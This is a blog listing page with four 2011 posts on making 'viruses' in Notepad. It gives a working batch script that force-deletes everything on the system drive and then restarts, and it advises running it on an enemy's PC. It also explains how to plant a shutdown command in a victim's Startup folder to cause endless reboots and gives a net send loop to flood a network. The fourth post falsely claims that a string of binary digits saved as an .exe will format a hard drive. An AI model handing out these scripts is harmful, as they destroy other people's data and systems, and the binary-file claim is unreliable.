Showing posts with label Virus Programming. Show all posts
Showing posts with label Virus Programming. Show all posts

Wednesday, September 28, 2011

Create Virus Which Crashes Windows within Few Seconds Using Notepad

This is a very simple virus program to delete all the contents of the C drive and completely deletes the windows operating system.

Open Notepad and Enter the following code
 
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save the above code with  .bat extension.

Caution: If you open the .bat file it will delete ur systemdrive. so be careful If Any lose of ur data i am not responsible for that. You should carefully use it. Use it only on your enemy's laptop or PC.

Monday, September 5, 2011

How to Create a Virus That Keeps on Restarting The Computer Using Notepad

Lets see how it works. Just close all windows . Now go to command prompt(Start >>>"RUN" now type "cmd"). Now you have entered MS-DOS/ Command prompt. Here You need to type "shutdown -s" or "restart -s". This will shutdown or restart your comp. We are making use of this DOS command to create this virus.

    * Just open a notepad

    * In that type "shutdown -s" or "restart -s".

    * Now save it as virus.bat.

    * Now when you run it your system gets turned off.

Note if .bat extension doesn't work try .exe extension

To make this more powerful just force your victim to copy this into "START>>>ALL PROGRAM>>> STARTUP". Now this program will load every time the computer starts and the computer will keep on restarting. 


ALSO SEE:

Create a Virus That Floods The Network Using Notepad

Trick To Make Virus Which can Format & Destroy Hard Disk

Monday, August 29, 2011

Create a Virus That Floods The Network Using Notepad

The below code will temporarily flood network once the user turns off his comp everything will be back to normal.
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flooding your network.


:CRASH

net send * WORKGROUP ENABLED

net send * WORKGROUP ENABLED

GOTO CRASH


As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.

Wednesday, July 6, 2011

Trick To Make Virus Which can Format & Destroy Hard Disk

Virus Code by toptricksandtips.blogspot.com


There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :


01001011000111110010010101010101010000011111100000

3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.

So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive.